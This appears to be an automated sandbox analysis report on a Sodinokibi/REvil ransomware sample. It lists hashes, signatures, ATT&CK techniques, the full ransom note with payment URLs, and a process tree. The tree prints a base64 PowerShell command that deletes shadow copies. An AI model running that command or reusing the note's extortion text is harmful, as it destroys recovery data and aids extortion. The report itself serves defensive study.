Analysis

  • max time kernel
    164s
  • max time network
    170s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:38

General

  • Target

    89a77693e6b0f16c8b51c02c2895622ad4bd4ea3fed11c069d19433a51aa55f6.exe

  • Size

    115KB

  • MD5

    186fc63770de2c15829a415ed0504abe

  • SHA1

    19f7900a62ec2227f73ec3423767f3959748002c

  • SHA256

    89a77693e6b0f16c8b51c02c2895622ad4bd4ea3fed11c069d19433a51aa55f6

  • SHA512

    0bbe0f7647c4bb8495ef1a057d66510ef50fb916ed3eb48c74b4686eae441652b0c148511dfd97c4f79282b48e952e08929c99bff96ee1d716c39ee304d6c331

Score
10/10

Malware Config

Extracted

Path

C:\uowl18-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension uowl18. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F3C64A81F74B4A39 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F3C64A81F74B4A39 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: pzW0kAOX/AZT59jimLFuBcWv6ctyGTMU0hy2grNyWHWeyq5kE2FSXdWTB3M1uhmN 16qW3jzpvUzdoJvM0zPYG6y2YqOxrSMFxVuSiu+9ISC0qR83sBMAeS7/2yi4ORCJ A/v7sqrIaPgtwEkfsAO+ckxseLp6ClisnkL316Lb6jziybWfEUPHhsGxdFRvT2so BOmaSEw4VMrswKTNoSI/7SdKO2yw5Kh6FcZ7L74d9L5W+INJI9KKyGAKxKwqo9Kd x/s7EWIBmsCod1DlWtK8XSgxzMarUaQFJZcOcSJ10S39/NI9FK0WqkwaK49EyjUb MtZxsjOGCMIIOdkkm6i/SBQHu4WB+tIU4ZBq+DgEimxuacufu6jDfvmh+okrATsM 3LvoeKM8XK08w3zlk0AJzKc0Nv5qYfDPilO7L18vwMQsAB+IBtJK0qYTTwmPJLYD BEHOPSS2NV2BGtD/xoPpUiJ1PBq0u4rqwAz82DS+4JEJaQtGBKqagi+fx8jokAOk jOXIcE2iul3qIXmgIECDhawM7aOM3nrMse2QYcckBQKptbB/l/+bQyi7U02rN5ZA bLH+uVq4GIhvk5pqSm7ImHzbKg1ISSefBmukevoB7sTLf21J75kje7zs0XsLEI/C gE5gdmIZkLrkZvUNTqdcT4RzNrIbJO+V2rAxEjnNx8qWYUwvErJp2kGZeyQRW4fn 3Do2PXT6soil6lZUNnyOT0GCIWry60XefFbbYE/4uix7+K6nTjTZO118KSW6Upgw TQwVLjFtYeTqa2phTxcvLddjar+SwkGbHs3i91Set4w4zbOVdWOZGi4qIE1WRpzy KHJmJu5yZ9u+J1N2x0CJIwSu9QnOVQBqfrUb+lOM+SYq+VhjMbmzeLphnQ/ZUvi8 7L/tv6Va2nijKxu0NR47zJYYF2rFhXI2NAisPHNyHskyxERJhJsMMAJEpiI4ah83 L4gg9TxuubUVwgGNNIU6roVYRB23VniYYta1ulaHl2mOwD9bKEmMNBkfg2JEVeJp SzyLiMWghlfFUjXuDbT41TY3KFUNX+Qvx3ou7ZjxgnUs0qHLRXNYugnK7VK29h88 Nc6qi3vXiGfDqfyuPFqq3fP1L9m2u9kx6tuHVreFiulGa67Sbk2C0vFsBdYovbK6 NP7UI8bpcypQGcEct0wyyhxepMZjREbLzJCsT5RscC171vQQVgFS5vroIGIqZsiO HyN9WmOi3ON5EiILZ95v1XoaMueTFHgBCP9GygqZilL8/OMOr5z9LKC2KzKu4kBc srLfn2iNUG/A2HfsNhfAtg== Extension name: uowl18 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F3C64A81F74B4A39

http://decryptor.cc/F3C64A81F74B4A39

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\89a77693e6b0f16c8b51c02c2895622ad4bd4ea3fed11c069d19433a51aa55f6.exe
    "C:\Users\Admin\AppData\Local\Temp\89a77693e6b0f16c8b51c02c2895622ad4bd4ea3fed11c069d19433a51aa55f6.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4048
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2708
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:712

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \??\c:\users\admin\appdata\local\microsoft\clr_v4.0\usagelogs\powershell.exe.log
      MD5

      17286868c0a043ae5d2ff5798b6a3163

      SHA1

      b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401

      SHA256

      40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6

      SHA512

      e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

    • memory/4048-120-0x000002301B070000-0x000002301B092000-memory.dmp
      Filesize

      136KB

    • memory/4048-124-0x000002301B390000-0x000002301B406000-memory.dmp
      Filesize

      472KB

    • memory/4048-131-0x0000023003040000-0x000002301B110000-memory.dmp
      Filesize

      384.8MB

    • memory/4048-137-0x0000023003040000-0x000002301B110000-memory.dmp
      Filesize

      384.8MB